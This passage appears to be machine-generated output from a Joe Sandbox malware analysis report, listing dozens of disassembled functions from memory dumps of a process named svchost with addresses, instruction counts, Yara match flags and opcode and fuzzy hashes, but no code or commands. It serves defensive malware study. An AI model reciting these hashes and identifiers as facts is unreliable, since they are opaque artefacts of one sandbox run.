                                                                              • Instruction ID: 7c6777e45114ee2b259e7384b5f4b27839a0686d70650b4eff9e356f0f0f83d7
                                                                              • Opcode Fuzzy Hash: d094bcd91e6f5b04b4608259ca810b4c4d3347fedabf7c6c4b16d72ee756281a
                                                                              • Instruction Fuzzy Hash: 9C41AF75100B449FDB26CF29C981BD6BBE9AB4A354F04442FF6999F650C774E804CB50
                                                                              Function 03A550E4 Relevance: .1, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                              • Instruction ID: f51081b46c23124f23162288773496e556541b234bf98df6a3c0a99c3cdb2721
                                                                              • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                              • Instruction Fuzzy Hash: A631D431A083419BEB21EB28C800767BAE5BF86754F0C856FFD868B381D274D841C7A2
                                                                              Function 03AF61C3 Relevance: .1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a348b358dc08d9d8c7de24184ab9d6e1d3c38354b5f8742a355c3e05f5e97f6b
                                                                              • Instruction ID: 297e22d965ddef2e6cdf14a63723d190725b401a867a90b1fb916ccdd228f55d
                                                                              • Opcode Fuzzy Hash: a348b358dc08d9d8c7de24184ab9d6e1d3c38354b5f8742a355c3e05f5e97f6b
                                                                              • Instruction Fuzzy Hash: 9331A176E00215EFDB19DF98CD80BAEB7B9EB48740F49416AF500AB254D774ED01CB94
                                                                              Function 03AF6BD7 Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c8d9305d39b6f576c26170394a0df4607d0ef141741020f24c5b9962ed265b3d
                                                                              • Instruction ID: 441ad80234f9b85874db4fddd785552d8e70c6a0a34f7ed4df09092a6c3b1ad2
                                                                              • Opcode Fuzzy Hash: c8d9305d39b6f576c26170394a0df4607d0ef141741020f24c5b9962ed265b3d
                                                                              • Instruction Fuzzy Hash: 39316D316002049FCB24DF6AD9C5A5B7BF4FF49344F8585AAF908DF249D270E945CBA4
                                                                              Function 03AF60B8 Relevance: .1, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd8fefc32f358eee74250669a6c2a53541df8e2ff009ff38f824f3f7a0eb921c
                                                                              • Instruction ID: 5d4d80e6c21f5fba64785222863cb5c12074057b723899b21c9226861e9434ac
                                                                              • Opcode Fuzzy Hash: bd8fefc32f358eee74250669a6c2a53541df8e2ff009ff38f824f3f7a0eb921c
                                                                              • Instruction Fuzzy Hash: 2B31E235B00215AFDB22EBA9CD40B6EBBB9AB84354F0445BAF645DB361DA30DD008B94
                                                                              Function 03A307AF Relevance: .1, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e5d71fa833a8d1c85d93ce40ea508961437422530057e66c6a80456ce13a7350
                                                                              • Instruction ID: 5136f9f8b664ba176c1beb75b89ca9d0b0bdac83ff35c779946e7b4587a3bd15
                                                                              • Opcode Fuzzy Hash: e5d71fa833a8d1c85d93ce40ea508961437422530057e66c6a80456ce13a7350
                                                                              • Instruction Fuzzy Hash: DE31A076A04751DBC711EF28C980E6BBBA5EF86760F05496BFC569B310DA30DC1187E1
                                                                              Function 03A2D6AA Relevance: .1, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                              • Instruction ID: eb43a35771edbffaabd0076309aedc849f8faa4c50c487ebd9d563ab6e2ac006
                                                                              • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                              • Instruction Fuzzy Hash: 1931E336A00A24AFDB21DF5CC980B2ABBB9DB81710F1D846FED259B242D338DD40CB50
                                                                              Function 0042EF73 Relevance: .1, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4eeb8354fe9e35b752ebb0e14636a36a251eaa19bdd11e70c9861eb1d2ff161f
                                                                              • Instruction ID: 5182746938f5bc1cb33c47248a9c10272ee5e5bee51c19b49db2c260a0882b41
                                                                              • Opcode Fuzzy Hash: 4eeb8354fe9e35b752ebb0e14636a36a251eaa19bdd11e70c9861eb1d2ff161f
                                                                              • Instruction Fuzzy Hash: BD31E372B106266BD354CE3AD880656F7E6FB88310B95863AD918C3B80E774F961C7D4
                                                                              Function 03A357C0 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3f857d78d7158342fd077451c557b50127f55c0307c9fc97317628e47e034ca1
                                                                              • Instruction ID: 70ea2c1dc56c1e3ad4a3de7320778ec72efa835459b3db9d7361008fcc8a7484
                                                                              • Opcode Fuzzy Hash: 3f857d78d7158342fd077451c557b50127f55c0307c9fc97317628e47e034ca1
                                                                              • Instruction Fuzzy Hash: 66318339B15A05FFDB51DB24DA40A59BBA5FF46354F4490ABE9018BB50D731E831CBC0
                                                                              Function 03A6A6C7 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                              • Instruction ID: 44fd35d0e12f29d0f4970963481795f8dd9f28c962e129b4cbbeb5da9d8c92c8
                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                              • Instruction Fuzzy Hash: 033128B2B00B00AFD760CF69DE41B57B7F8AB09A50F08092EA59AD3650E730E900CB64
                                                                              Function 00402FB0 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 45a800a4a171d570def4212989f71f5cbb68d8cfe5dba5bd1d5a4888de5d8b4a
                                                                              • Instruction ID: 6ae0b5017d348af5fb59412a67a9ca8fc38f259dc942650c7cbe58ce921f0122
                                                                              • Opcode Fuzzy Hash: 45a800a4a171d570def4212989f71f5cbb68d8cfe5dba5bd1d5a4888de5d8b4a
                                                                              • Instruction Fuzzy Hash: 2C31B172A10A108FD368CE6ED945657F7E1EF88340B45866EE959D7780DAB8EC01CB84
                                                                              Function 03A5438F Relevance: .1, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 663a37088795cf2c3b3e837922d66265ba1aeb4edf4038e2b67683f210b208fc
                                                                              • Instruction ID: 9c84c3cef76a2a9b52a5f8459333ef394efc3a95333ed19f0e86abd975400cbe
                                                                              • Opcode Fuzzy Hash: 663a37088795cf2c3b3e837922d66265ba1aeb4edf4038e2b67683f210b208fc
                                                                              • Instruction Fuzzy Hash: 8D31D631B403059FDB24EFA9C980B6FB7F9AB98305F00852BE945E7654D770E985CB50
                                                                              Function 03A392C5 Relevance: .1, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                              • Instruction ID: 41f29a22330a59c21a04975728f2cca3478fb6dcd4e2fe8ab7c2f222da2ba32f
                                                                              • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                              • Instruction Fuzzy Hash: 3E316BB56083499FCB01DF18D980A5ABBE9EF89350F04096EF9519B3A1D734DC14CBA2
                                                                              Function 03A87190 Relevance: .1, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                              • Instruction ID: 8496094d4679e3b686f4be02aba5f420f422d013868d0591c44310e954c57651
                                                                              • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                              • Instruction Fuzzy Hash: 65318A75604206CFC710DF18C480956FBF5FF89350B2986AEE9589B325EB31ED46CB91
                                                                              Function 03AEC3CD Relevance: .1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                              • Instruction ID: b3f6e7d3d8c8a3883213dff33af035c1f032d0e2f1a715ff1d47f1c30f62f4ac
                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                              • Instruction Fuzzy Hash: C3210B3F600755A6CB14EBA58D44ABBF7B4EF50620F40841BFD668B792E634D950C360
                                                                              Function 03A2C156 Relevance: .1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 10441682143ff2e10de1f0fbafad119bfaf6e13f04ad73d989a75c3fd091e69e
                                                                              • Instruction ID: 63f5049d048da65b0ce98542e13307ed5445b2d683e46318757187c724efc1c0
                                                                              • Opcode Fuzzy Hash: 10441682143ff2e10de1f0fbafad119bfaf6e13f04ad73d989a75c3fd091e69e
                                                                              • Instruction Fuzzy Hash: CB31E8755003108BCB31FF28CD41BA9B7B4AF41314F5885AEE8459F3C1DA78D985CB90
                                                                              Function 03A2E388 Relevance: .1, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                              • Instruction ID: 6be498ffc77f99da7f20357187ce17bdcc4030ce99e742110f029f2edc085d95
                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                              • Instruction Fuzzy Hash: B6319835600614EFDB25DF68C984F6ABBB9EF84354F1449AAE5128B790E730EE42CB50
                                                                              Function 03B003E6 Relevance: .1, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ca4fc2d2057f2b721026d9e3821c641e589cdf5e38f45c9aa7b9859f06b89267
                                                                              • Instruction ID: 842f19eb48e24731352997c2f9350ca748b29e7c628d8a17d6c6e99c31b900b6
                                                                              • Opcode Fuzzy Hash: ca4fc2d2057f2b721026d9e3821c641e589cdf5e38f45c9aa7b9859f06b89267
                                                                              • Instruction Fuzzy Hash: A1316671B00115AFCB14EBA5D994F9FBBB9FF88208F414179E905E7240DB306E04CB94
                                                                              Function 03AAE609 Relevance: .1, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe0e0c0a6e68b9f076e0073759958ebc725c619241f1a18fd81638372ad471a7
                                                                              • Instruction ID: 5414556288cea4aca77af54bd0584462f8baaf486434672ffbac3bb4c914b861
                                                                              • Opcode Fuzzy Hash: fe0e0c0a6e68b9f076e0073759958ebc725c619241f1a18fd81638372ad471a7
                                                                              • Instruction Fuzzy Hash: 3231A076A00605DFCB14CF1CC884EAEB7B6FF88304B15495AF8099B390E775EA41CB90
                                                                              Function 03A33616 Relevance: .1, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a512ea7c77e36fa44f0a9791b17442934fba15b4d4c98502007f78b92335f0d4
                                                                              • Instruction ID: e82ca08e98a277a2a833a2383085bda930f6a61556bc48cd8c53f5a5139baf80
                                                                              • Opcode Fuzzy Hash: a512ea7c77e36fa44f0a9791b17442934fba15b4d4c98502007f78b92335f0d4
                                                                              • Instruction Fuzzy Hash: 9021D4392497509FCB61DF04CA44B2ABBA4EF82B14F09056EF8450B7A1C7B4DC44CB81
                                                                              Function 03B00591 Relevance: .1, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3f996f56f7e18af1709c04f8104eed9d81abd0e8ce6b4e7374b6f01a7499018d
                                                                              • Instruction ID: 9b92ea5652eec92414f08be214399c4127a8bee0d9253d5814bdf9d0c5776272
                                                                              • Opcode Fuzzy Hash: 3f996f56f7e18af1709c04f8104eed9d81abd0e8ce6b4e7374b6f01a7499018d
                                                                              • Instruction Fuzzy Hash: 6721F3326002058FD728DE29C880BBABBA6EFD4308F5945B8E905CB2C5D730F845C750
                                                                              Function 03A5F32A Relevance: .1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                              • Instruction ID: 776df0fbfa74df8bb085ee9a9a24d65ac25c63c8521db731e0b29bba83dc814f
                                                                              • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                              • Instruction Fuzzy Hash: 37219D72200300DFD719DF15C545B6ABBF9EFA5365F15816EE91A8B3A0EBB0E801CB94
                                                                              Function 03AB06F1 Relevance: .1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 505861c4915b04f2863257ddab4115b3c054bc400dc3252a8b1146e6799410e6
                                                                              • Instruction ID: 35dabd07cad794f77d1305b6b6fb5542d963e8ac63f654862c33f5943f086e1e
                                                                              • Opcode Fuzzy Hash: 505861c4915b04f2863257ddab4115b3c054bc400dc3252a8b1146e6799410e6
                                                                              • Instruction Fuzzy Hash: 06218D75A00629ABCF20DF59C981ABFF7F8FF49740B54006AE541AB241D778AD52CBA0
                                                                              Function 03AB019F Relevance: .1, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4394f00247f787b554161ca54f03d8e85f3f4b4577b6125826e06ed32b0efdf6
                                                                              • Instruction ID: ead4f6dccd50184d9fe44f6895c31d9cb99c59526c4c7772cf63b4d90afd4fc4
                                                                              • Opcode Fuzzy Hash: 4394f00247f787b554161ca54f03d8e85f3f4b4577b6125826e06ed32b0efdf6
                                                                              • Instruction Fuzzy Hash: F721BC75600604AFCB15DB68D980F6AB7B8FF88740F14016AF944DB7A1D738ED50CBA8
                                                                              Function 0040E327 Relevance: .1, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 840a2fd9e028f7df6c3e3ec71b50f5a496b290202e8a564413fe86911f32c7a9
                                                                              • Instruction ID: 83d3d523921f1eff9f7971cfd0a331b6a94b6925ff9c22d2d14fa44f3c2a1d8b
                                                                              • Opcode Fuzzy Hash: 840a2fd9e028f7df6c3e3ec71b50f5a496b290202e8a564413fe86911f32c7a9
                                                                              • Instruction Fuzzy Hash: 0B21D6316042449FD724DF76C481BAFBBF5FF88300F45896EE856AB790C675A801CB50
                                                                              Function 0040E333 Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2f5f4cfdd5568e419b4a3362ddd129d94e32a39e545a43534ac65346fe52ccb2
                                                                              • Instruction ID: 04c5af5b3486ce43d0e96e6d7db02ae5e07e50a546c7eee53030f918697a5587
                                                                              • Opcode Fuzzy Hash: 2f5f4cfdd5568e419b4a3362ddd129d94e32a39e545a43534ac65346fe52ccb2
                                                                              • Instruction Fuzzy Hash: 0A21C731A043449BC724DF66C881B6FBBF5FF88300F45887EE856AB781C674E9118751
                                                                              Function 03AB0283 Relevance: .1, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5d0e53e777885b1d2ca7fde7633ab3e0860f28b5d5fb482448331dac3c712cfe
                                                                              • Instruction ID: 02ab7f6b5abb7ad43a892a62fba816729fb9701e8973191bc19f537efc0a1226
                                                                              • Opcode Fuzzy Hash: 5d0e53e777885b1d2ca7fde7633ab3e0860f28b5d5fb482448331dac3c712cfe
                                                                              • Instruction Fuzzy Hash: 0721B0729043459BC711EF69C948BABF7FCBF81240F08455BBD80CB292D734D948C6A2
                                                                              Function 03AAD0C0 Relevance: .1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                              • Instruction ID: c699146f45b4bb1a427ab309b04656c33923b4e7aedf325ee4dc2aa737b0d378
                                                                              • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                              • Instruction Fuzzy Hash: 8321B072644B00ABD311DF1CCC51B5BBBB4EB89720F04052FF9859B7A0D730D90187A9
                                                                              Function 03B001AA Relevance: .1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a7e7540d6b35ae0773defcbfdf58532279f93a25ff1c4da5357d5f6d1b62e69a
                                                                              • Instruction ID: 2f69d4ba6420ce59ad5e1e369c31798c21275ad31b46d0ff109f90485169308d
                                                                              • Opcode Fuzzy Hash: a7e7540d6b35ae0773defcbfdf58532279f93a25ff1c4da5357d5f6d1b62e69a
                                                                              • Instruction Fuzzy Hash: 4D21E4612042504FE745CB1A88B44B6BFE5EFD6229B0982E6D8C4CB346C135D907C7B0
                                                                              Function 03A6A30B Relevance: .1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 70d0f84faab431c625d840ca31eed989c339b15e834d3396036205dd3872479d
                                                                              • Instruction ID: fcda52dc117d75957cee4c037bd19ced99529df4bbe9c78f20a5036528925e5d
                                                                              • Opcode Fuzzy Hash: 70d0f84faab431c625d840ca31eed989c339b15e834d3396036205dd3872479d
                                                                              • Instruction Fuzzy Hash: FC217F7A200B119FC725DF29C901B56B7F5AF48704F1884AAA519DBB61E371E842CF94
                                                                              Function 03A2B765 Relevance: .1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 92d2e8cde5494efff6856a8dc7afe75558ac7ffe81cf384827968c51bb13822e
                                                                              • Instruction ID: 7538c14602a77caacf4f70c10952b4d8e2efa8e27f4860091f3245760eb7770d
                                                                              • Opcode Fuzzy Hash: 92d2e8cde5494efff6856a8dc7afe75558ac7ffe81cf384827968c51bb13822e
                                                                              • Instruction Fuzzy Hash: FB217C36100710DFC722EF58CA40F59BBF5FF58708F144A6EE0099BAA1C774A814CB54
                                                                              Function 03AFEE26 Relevance: .1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83e7f85f329b29a41cb252c81359b82f58bd3a56d5b9d7ec1fa6edebf5d7e441
                                                                              • Instruction ID: c4ee327196b94553d2f41869df296122e72dcebac36540ffd61e9e0161498653
                                                                              • Opcode Fuzzy Hash: 83e7f85f329b29a41cb252c81359b82f58bd3a56d5b9d7ec1fa6edebf5d7e441
